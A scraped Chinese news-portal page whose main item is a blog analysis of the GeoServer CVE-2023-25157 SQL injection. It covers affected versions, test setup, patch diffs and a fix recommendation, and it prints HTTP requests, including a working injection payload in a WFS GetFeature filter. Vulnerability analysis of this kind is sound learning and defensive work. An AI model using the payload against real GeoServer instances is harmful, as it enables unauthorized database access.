最新要闻
- 天天快资讯丨左转被直行撞责任图解(直行撞左拐谁的责任大)
- 环球简讯:高温天气来了,这份权益保护指南请收好
- AMD赞助游戏排斥NVIDIA技术?官方回应耐人寻味
- 北大教授姚洋反对中考分流:40%孩子锁定为低收入者 应10年义务教育 世界快报
- 在拳头中国工作有多爽?上班随时打游戏 老板不能打断
- 男子中近800万彩票后瞒着妻子:妻子要求分割_天天快消息
- 【聚看点】韩系车国内入冬!现代汽车集团CEO:缩减产品线 关停、出售工厂
- 篱落疏疏一径深树头新绿未成阴_篱落疏疏一径深
- 全球播报:恒大地产新增3条被执行记录 执行标的合计8.4亿元
- 全球今热点:危险!男子往保温杯加除垢剂和热水摇晃后爆炸
- 端午节后连上6天班 专家称调休多上一天班提高不了效率
- 环球新资讯:杭州一男子绿化带内迷路四天三夜:吃野花喝露水求生
- 你相信光吗?FF91交付推迟 贾跃亭激情发文回应:加速中国落地等_世界观察
- AI化身“印钞机”!扎克伯格等4位富豪因其暴赚10000亿_环球快看
- 湖北省商务厅第七届中俄博览会出访行程公布
- 每日看点!安徽35岁女子在上海相亲,被62岁大爷相中,直言每月给30万零花钱
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
浅析GeoServer CVE-2023-25157 SQL注入_全球热消息
简介
GeoServer是一个开源的地图服务器,它是遵循OpenGIS Web服务器规范的J2EE实现,通过它可以方便的将地图数据发布为地图服务,实现地理空间数据在用户之间的共享。
影响版本
geoserver<2.18.7
(相关资料图)
2.19.0
<=geoserver<2.19.7
2.20.0
<=geoserver<2.20.7
2.21.0
<=geoserver<2.21.4
2.22.0
<=geoserver<2.22.2
环境搭建
安装方式有多种可以选择
windwos下载安装
https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download
下载后只需要指定端口直接下载可完成安装
war包安装
tomcat下载地址
https://dlcdn.apache.org/tomcat/tomcat-8/v8.5.90/bin/apache-tomcat-8.5.90-windows-x64.zip
geoserver下载地址
https://sourceforge.net/projects/geoserver/files/GeoServer/2.23.1/geoserver-2.23.1-war.zip
解压下载后的文件geoserver-2.15.1-war.zip,得到geoserver.war
把此geoserver.war文件拷贝到tomcat根目录下的webapps文件夹下。
启动tomcat
访问路径,默认端口为8080,端口根据自己的需求开放即可,这里我开放的端口为8081
http://localhost:8081/geoserver/web/
分析
POC下载链接
https://github.com/win3zz/CVE-2023-25157
python3 CVE-2023-25157.pyhttp://localhost:8081
查看提交的补丁分析一下漏洞
https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d
修改了配置文件src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/ConfigDatabase.java
重新添加了模块org.geoserver.jdbcloader.JDBCLoaderProperties
模块用于配置文件jdbcconfig/jdbcconfig.properties
中的 JDBCConfig 模块
属性字段并更改了构造函数以包含此属性字段。这允许对数据库配置进行更多自定义,从而可能允许增强安全措施。NamedParameterJdbcTemplate
是 Spring Framework 提供的一个类,它添加了对使用命名参数对 JDBC 语句进行编程的支持,而不是使用经典占位符 ("?") 参数对 JDBC 语句进行编程
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
public ConfigDatabase( JDBCLoaderProperties properties, DataSource dataSource, XStreamInfoSerialBinding binding) { this(properties, dataSource, binding, null); } public ConfigDatabase( JDBCLoaderProperties properties, final DataSource dataSource, final XStreamInfoSerialBinding binding, CacheProvider cacheProvider) { this.properties = properties; this.binding = binding; this.template = new NamedParameterJdbcTemplate(dataSource);
通过使用参数化查询而不是字符串连接
src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/OracleDialect.java
在插入中做了修改
//sql.insert(0, "SELECT * FROM (SELECT query.*, rownum rnum FROM (\n"); //sql.append(") query\n"); sql.insert( 0, "SELECT * FROM (SELECT query.*, rownum rnum FROM (" + (isDebugMode() ? "\n" : "")); sql.append(") query"); appendIfDebug(sql, "\n", " ");
修改了插入语法,其方法在src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/Dialect.java
中定义
public boolean isDebugMode() { return debugMode; } public void setDebugMode(boolean debugMode) { this.debugMode = debugMode; } /** Escapes the contents of the SQL comment to prevent SQL injection. */ public String escapeComment(String comment) { String escaped = ESCAPE_CLOSING_COMMENT_PATTERN.matcher(comment).replaceAll("*\\\\/"); return ESCAPE_OPENING_COMMENT_PATTERN.matcher(escaped).replaceAll("/\\\\*"); } /** Appends the objects to the SQL in a comment if debug mode is enabled. */ public StringBuilder appendComment(StringBuilder sql, Object... objects) { if (!debugMode) { return sql; } sql.append(" /* "); for (Object object : objects) { sql.append(escapeComment(String.valueOf(object))); } return sql.append(" */\n"); } /** Appends the objects to the SQL in an comment if debug mode is enabled. */ public StringBuilder appendComment(Object sql, Object... objects) { return appendComment((StringBuilder) sql, objects); } /** Appends one of the strings to the SQL depending on whether debug mode is enabled. */ public StringBuilder appendIfDebug(StringBuilder sql, String ifEnabled, String ifDisabled) { return sql.append(debugMode ? ifEnabled : ifDisabled); }
获取功能名POC
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1Host: 10.10.12.35:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=node0iyysq0tt08lup1gy571ox3id1.node0Upgrade-Insecure-Requests: 1
获取功能属性POC
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:coastlines&maxFeatures=1&outputFormat=json HTTP/1.1Host: 10.10.12.35:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=node0iyysq0tt08lup1gy571ox3id1.node0Upgrade-Insecure-Requests: 1
构造恶意payload
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:coastlines=strStartsWith%28scalerank%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1Host: 10.10.12.35:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=node0iyysq0tt08lup1gy571ox3id1.node0Upgrade-Insecure-Requests: 1
这里引用一张图,geotools的注入漏洞
漏洞编号CVE-2023-25158,查看补丁发现
在类中添加该escapeBackslash
字段modules/library/jdbc/src/main/java/org/geotools/data/jdbc/FilterToSQL.java
是一种预防措施,可防止某些形式的 SQL 注入,其中反斜杠字符用于转义 SQL 语法中的特殊字符
// single quotes must be escaped to have a valid sql string String escaped = escapeLiteral(encoding);
调用类escapeLiteral()
中的方法EscapeSql.java
。此方法旨在不仅转义单引号,还转义反斜杠,并可能根据其参数转义双引号
public static String escapeLiteral( String literal, boolean escapeBackslash, boolean escapeDoubleQuote) { // " --> "" String escaped = SINGLE_QUOTE_PATTERN.matcher(literal).replaceAll(""""); if (escapeBackslash) { // \ --> \\ escaped = BACKSLASH_PATTERN.matcher(escaped).replaceAll("\\\\\\\\"); } if (escapeDoubleQuote) { // " --> \" escaped = DOUBLE_QUOTE_PATTERN.matcher(escaped).replaceAll("\\\\\""); } return escaped;
至于为什么会聊到CVE-2023-25158,这里就要聊到Geoserver
和Geotools
的关系了,可以参考这篇文章
https://blog.csdn.net/nmj2008/article/details/113869086
修复方案
升级安全版本,目前已经有最新版本。
更多网安技能的在线实操练习,请点击这里>>
关键词:
-
java中synchronized和ReentrantLock的加锁和解锁能在不同线程吗?如果能,如何实现?
java中synchronized和ReentrantLock的加锁和解锁能在不同线程吗?如果
来源: 浅析GeoServer CVE-2023-25157 SQL注入_全球热消息
java中synchronized和ReentrantLock的加锁和解锁能在不同线程吗?如果能,如何实现?
天天快资讯丨左转被直行撞责任图解(直行撞左拐谁的责任大)
环球简讯:高温天气来了,这份权益保护指南请收好
AMD赞助游戏排斥NVIDIA技术?官方回应耐人寻味
北大教授姚洋反对中考分流:40%孩子锁定为低收入者 应10年义务教育 世界快报
在拳头中国工作有多爽?上班随时打游戏 老板不能打断
男子中近800万彩票后瞒着妻子:妻子要求分割_天天快消息
【聚看点】韩系车国内入冬!现代汽车集团CEO:缩减产品线 关停、出售工厂
篱落疏疏一径深树头新绿未成阴_篱落疏疏一径深
环球焦点!发力电子后视镜CMS,芯驿电子与映赛科技达成战略合作
债市日报:6月21日 天天速看
全球微动态丨【财经面对面】平安健康互联网医院院长杨昆:加快AI赋能 打造O2O医疗健康服务
【金融街发布】人民银行:深入推进金融系统审计整改工作
全球播报:恒大地产新增3条被执行记录 执行标的合计8.4亿元
全球今热点:危险!男子往保温杯加除垢剂和热水摇晃后爆炸
端午节后连上6天班 专家称调休多上一天班提高不了效率
环球新资讯:杭州一男子绿化带内迷路四天三夜:吃野花喝露水求生
你相信光吗?FF91交付推迟 贾跃亭激情发文回应:加速中国落地等_世界观察
AI化身“印钞机”!扎克伯格等4位富豪因其暴赚10000亿_环球快看
湖北省商务厅第七届中俄博览会出访行程公布
MyBatis-Plus 实现动态字段排序|播资讯
环球热点评!【技术积累】数据结构中的基本概念【一】
多卡训练_环球热闻
快看点丨记录--新的HTML标签 :
每日看点!安徽35岁女子在上海相亲,被62岁大爷相中,直言每月给30万零花钱
什么是核心素养?
每日热门:空气循环扇和传统风扇怎么选?别再被商家忽悠了
印度德里地铁将支持手机二维码乘车 网友:遥遥领先 焦点关注
当前热文:马斯克又出惊人语录:做生意是为了促进和保护人类文明
苹果受益!国产手机在德国等欧洲市场没法卖了:诺基亚用专利封杀 世界百事通
焦点热议:腾讯《三体》编剧:奈飞版《三体》一集的预算能拍我们一整部 技术太落后
312斤女网红在减肥营离世,专家:减肥不当会闭经,每周减重不要多于1Kg-时快讯
不请自来!哪些猫咪品种经常光顾邻居家?_今日精选
环球微头条丨AI教你实现敏捷游戏自由,再也不用担心陷入瓶颈啦!
Linux Powershell 安装教程 天天快播报
C#语言async, await 简单介绍与实例(入门级) 当前聚焦
北向资金全天小幅净卖出6.41亿元 时讯
读懂“中文大脑”,破解阅读障碍
信用卡逾期收到律师函怎么办?信用卡逾期律师函来了后果严重吗?
新动态:彩票为什么不能网上卖_彩票为什么不能网上买
首款骁龙8 Gen2平板要来了:内置散热风扇 游戏神器|环球今头条
每日报道:AI血洗时尚圈!就连这些线上店家都开始用AI生成爆款了
电池有缺陷被特斯拉踢出供应链?宁德时代辟谣:消息不实
宣告放弃LCD材料!三星、LG供应商默克集团全力研发MicroLED等新材料
天天速讯:高考查分遇上端午假期:31省成绩23日起陆续公布
台电P76t_台电p76v
红楼梦摘抄400字_红楼梦摘抄
【全球新视野】柔道著名运动员(郝义 柔道运动员)
五证一书指什么生肖(五证一书指什么)|世界最新
A股分红派息转增一览:43股今日股权登记
每日焦点!苹果或重新发明苹果汽车安全带:打造发光安全带扣
又瞎折腾!Windows 11将删除9个文件夹选项
帮人就是帮己!西南大学校长毕业寄语被狂赞:外卖别随意给差评 大胆扶摔倒老人_环球观焦点
keycloak~CountDownLatch在keycloak中的使用 资讯推荐
高精度离线免费 的C#文字识别PaddleOCR库|速递
环球快讯:星纪魅族官宣参展2023 MWC上海:Flyme Auto、魅族20系列重磅登场
每日热文:余承东大喜!工信部:支持L3级及更高级别自动驾驶功能商业化应用
鲜嫩入味 Q弹不柴:驰迈即时鸡胸肉50g*5袋9.9元_天天看点
全球时讯:《闪电侠》预示华纳影业面临巨大亏空
环球今热点:国服关停5个月后:成都猎人队宣布彻底退出《守望先锋》联赛
全球简讯:即视角|出海正当时:欧美、东南亚、中东、拉美市场观察
参展动态 | 璞华参展第九届中国(上海)国际技术进出口交易会-全球关注
国泰君安:5月挖机销量略超预期,静待下半年行业复苏
致命摇篮下载 1080p 下载 致命摇篮迅雷下载 全球微动态
【世界新视野】京雄大桥顺利合龙!京雄高速将于年内全线通车(图)
【快播报】印尼很快将不再出口原铜因希望从资源中寻求更多价值金十数据6月21日讯,印度尼西亚总统佐科当地时间周二表示,该国很快将不再出口原铜,因为这一金属将在国内
首销仅售32元:3DMark登陆Epic商店
国内油价冲破上调红线!端午节过后涨价可能性很大
笔记本存储“官方升级”谁最贵最坑?对比后揭晓答案 新资讯
免费玩!国产大作《仙剑奇侠传7》即将登陆XGP订阅服务-当前短讯
演员陈建斌多巴胺穿搭引热议 律师:AI换脸侵犯肖像权
全球热推荐:官宣!NBA历史第一高薪即将诞生,哈登交易方案,勇士3人离队
万能u盘低级格式化工具下载_u盘格式化工具下载-世界热推荐
关于在Redhat-7-linux-系统-Apache-2.4.6-版本上部署多个版本的yum仓库-的配置文件写法
【Java】使用 validation 完成自定义校验注解 今日热文
性能提升30%!袋鼠云数栈基于 Apache Hudi 的性能优化实战解析|世界新视野
视频直播源码技术知识分享:连麦功能(一)
环球即时看!ClickHouse(14)ClickHouse合并树MergeTree家族表引擎之VersionedCollapsingMergeTree详细解析
北汽极狐成立法务部:200万粉丝知名汽车博主收到“告知函” 快资讯
中国首位!科学家付巧妹获联合国阿勒福赞奖-全球快播
226元大额券:361板鞋运动鞋休闲鞋74元抄底|全球百事通
离大谱!男子偷马路卖钱:把路分成小块去卖 天天时讯
3岁女童患罕见病 肚大如石鼓随时会“爆炸”:医生科普 续命针1次上万-环球快播
当前滚动:【后端面经-java】java线程池满的处理策略
Rust语言 - 接口设计的建议之受约束(Constrained)_天天最资讯
java~理解可重入锁 焦点速读
硬件博主自费实测5大旗舰手机信号:iPhone各种被狂虐
焦点热文:载亿万富翁观光潜艇失联 被曝用游戏手柄操控 专家:生还希望渺茫
电动汽车也能无线充电了:像手机一样简单 超大充电板长这模样
全球热议:微软停止涨薪影响明显:员工跳槽意愿上涨23%
11499元 三星首款5K专业显示器上架:配可拆卸4K摄像头
环球今日讯!java~字节码操作ASM
班主任和家长扮恐龙接中考生 现场让网友看笑:可爱的显眼包 全球信息
史上最深深海救援!观光潜艇失联:搜救无进展 氧气剩不多、或卡残骸中|全球讯息
公募基金派发约八百亿元“红包雨” 债基占比超八成
俄妹COS《塞尔达》公主火了 性感美艳:欧美曾呼吁塞尔达公主应黑人|时快讯
环球热文:破75%了!理想汽车家用交流充电桩安装率遥遥领先
比亚迪赵长江:腾势N7领先两代 将成为家用和年轻人首选大五座标杆SUV
全球短讯!年轻人第一辆车!“小米汽车”非官方渲染图又来了:质感拉满 你会买吗